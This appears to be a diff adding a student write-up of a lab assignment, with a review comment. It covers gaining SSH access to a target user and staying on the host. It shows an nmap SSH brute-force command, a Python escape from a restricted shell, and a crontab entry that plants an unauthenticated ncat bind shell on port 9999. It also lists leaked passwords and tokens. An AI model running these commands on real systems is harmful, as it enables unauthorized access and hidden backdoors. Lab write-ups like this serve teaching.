| 1 | +# 6: Privilege Escalation and Persistence |
| 2 | + |
| 3 | +The task is simple: Get SSH access to moriarty@192.168.1.193 and find flag. |
| 4 | +We are given a hint: Despite being a criminal mastermind, |
| 5 | +this person loves reading superhero comic books….. nerd! |
| 6 | + |
| 7 | +So first we tried to bruteforce the password for user moriarty using the list |
| 8 | +of 1000 most common passwords (https://raw.githubusercontent.com/DavidWittman/wpxmlrpcbrute/master/wordlists/1000-most-common-passwords.txt) |
| 9 | +and command: |
| 10 | + |
| 11 | +``` |
| 12 | +sudo nmap -sS -sV -p 22 192.168.1.193 -v -n --script ssh-brute --script-args userdb=names.txt,passdb=1000-most-common-passwords.txt |
| 13 | +``` |
| 14 | + |
| 15 | +This sadly failed and didn't find the correct password. |
| 16 | +So we tried to guess what the password might be and on the first try we get in; |
| 17 | +the password was 'batman'. |
| 18 | + |
| 19 | +After getting in we see, that we have only 2 command available, python and ls. |
| 20 | +Using python we are able to spawn a shell: |
| 21 | + |
| 22 | +``` |
| 23 | +import os; print(os.system('/bin/bash')) |
| 24 | +``` |
| 25 | + |
| 26 | +After that, we could roam freely all over the server. |
| 27 | +First thing we did was to have some persistence we added following line to crontab: |
| 28 | + |
| 29 | +``` |
| 30 | +(crontab -l ; echo "@reboot sleep 200 && ncat -l 9999 -k -c /bin/bash")|crontab 2> /dev/null |
| 31 | +``` |
| 32 | + |
| 33 | +Which will upon reboot spawn a shell acessible on port 9999. |
| 34 | + |
| 35 | +After that, we explore more of what we can do. After a few minutes we stumble upon |
| 36 | +folder assignment07 under /home/user which contains script for the 7th assignment. |
| 37 | +In file password_rotator.sh we find whole script for the assignment from which we draw following conclusions: |
| 38 | + |
| 39 | +1. The passwords that the user rotates are: "superman" "ironman" "batman" "4a7#mgannn2LDD90T#1fX#0Yx%m!kxrMSmUXd60xKwdM0S6u" |
| 40 | + |
| 41 | +2. The file with second token is: /var/tmp/tokens/second_token.txt and it's content |
| 42 | +changes to following values: "Hysterical" "Spaghetti" "Floss" "Apparently" |
| 43 | +which together give the token for second part of the assignment: HystericalSpaghettiFlossApparently |
| 44 | +This token is also in the first comment in the script |
| 45 | +``` |
| 46 | +#TOKEN:HystericalSpaghettiFlossApparently |
| 47 | +``` |
| 48 | + |
| 49 | +3. The flag server for second part of the assignment is 192.168.1.167:9453 |
| 50 | + |
| 51 | +4. On password rotation all ssh session to moriarty are killed so we won't be able |
| 52 | +to persist our ssh connection but we can definitely spawn a remote shell which shouldn't |
| 53 | +get killed by the script. |
| 54 | + |
| 55 | +After looking into the /vat/tmp/tokens folder we find token and flag server for first part |
| 56 | +of the task as well. We try to submit both flags but flag for token for the part B doesn't |
| 57 | +work which we later get to know was unintentional. |
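Review bot: The closing paragraph refers to `/vat/tmp/tokens`, which contradicts the `/var/tmp/tokens/second_token.txt` path stated in conclusion 2; one of the two is a typo and the writeup should use one consistent path so the token location can be followed. The heading announces privilege escalation, but the body only documents escaping the restricted two-command shell with `import os; print(os.system('/bin/bash'))` and adding a crontab entry as the same moriarty user; either document the actual escalation step or retitle the section to match what was done. The persistence entry `@reboot sleep 200 && ncat -l 9999 -k -c /bin/bash` also deserves a sentence of explanation: it starts an unauthenticated listener on port 9999 that hands a shell to any host that connects, runs only with moriarty's privileges, and is exactly the kind of artifact a crontab review or a listening-port check on the server would surface, which is worth noting next to conclusion 4's remark that the rotation script kills SSH sessions but not this shell. Finally, `userdb=names.txt` in the nmap command is never described; state what the file contained so the brute-force attempt is reproducible.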